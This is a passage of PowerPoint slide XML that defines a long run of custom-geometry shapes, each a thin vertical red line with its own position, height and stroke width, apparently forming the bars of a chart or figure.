            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="129539">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="129511"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="object 400"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6013798" y="5647395"/>
            <a:ext cx="0" cy="339754"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="171450">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="171345"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="object 401"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6013798" y="5644420"/>
            <a:ext cx="0" cy="346046"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="174625">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="174348"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="402" name="object 402"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6033630" y="5802891"/>
            <a:ext cx="0" cy="184977"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="93344">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="92878"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="403" name="object 403"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6033630" y="5799916"/>
            <a:ext cx="0" cy="190011"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="95885">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="95880"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="object 404"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6053465" y="5747359"/>
            <a:ext cx="0" cy="240345"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="121285">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="120901"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="405" name="object 405"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6053465" y="5744383"/>
            <a:ext cx="0" cy="246636"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="124460">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="123904"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="406" name="object 406"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6073695" y="5797340"/>
            <a:ext cx="0" cy="190011"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="95885">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="95679"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="object 407"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6073695" y="5794363"/>
            <a:ext cx="0" cy="196302"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="99060">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="98682"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="object 408"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6093530" y="5658505"/>
            <a:ext cx="0" cy="328429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="165735">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="165739"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409" name="object 409"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6093530" y="5655530"/>
            <a:ext cx="0" cy="334721"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="168910">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="168741"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410" name="object 410"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6113362" y="5836209"/>
            <a:ext cx="0" cy="151002"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="76200">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="76064"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="object 411"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6113362" y="5833235"/>
            <a:ext cx="0" cy="157294"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="79375">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="79067"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="object 412"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6133196" y="5675162"/>
            <a:ext cx="0" cy="312070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="157480">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="157334"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="object 413"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6133196" y="5672187"/>
            <a:ext cx="0" cy="318362"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="160655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="160336"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="object 414"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6153029" y="5780676"/>
            <a:ext cx="0" cy="206367"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="104139">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="104088"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415" name="object 415"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6153029" y="5777701"/>
            <a:ext cx="0" cy="212659"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="107314">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="107090"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416" name="object 416"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172861" y="5675162"/>
            <a:ext cx="0" cy="312070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="157480">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="157334"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="object 417"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172861" y="5672187"/>
            <a:ext cx="0" cy="318362"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="160655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="160336"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="object 418"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6192696" y="5802891"/>
            <a:ext cx="0" cy="184977"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="93344">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="92878"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="object 419"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6192696" y="5799916"/>
            <a:ext cx="0" cy="190011"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="95885">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="95880"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="object 420"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6212528" y="5730695"/>
            <a:ext cx="0" cy="256701"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="129539">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="129310"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="object 421"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6212528" y="5727720"/>
            <a:ext cx="0" cy="262995"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="132714">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="132312"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="422" name="object 422"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6232362" y="5808442"/>
            <a:ext cx="0" cy="178686"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="90169">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="90076"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="423" name="object 423"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6232362" y="5805469"/>
            <a:ext cx="0" cy="184977"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="93344">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="93078"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424" name="object 424"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6252195" y="5652946"/>
            <a:ext cx="0" cy="334721"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="168910">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="168544"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="object 425"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6252195" y="5649973"/>
            <a:ext cx="0" cy="341012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="172085">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="171546"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="object 426"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6272029" y="5841762"/>
            <a:ext cx="0" cy="145968"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="73660">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="73262"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427" name="object 427"/>
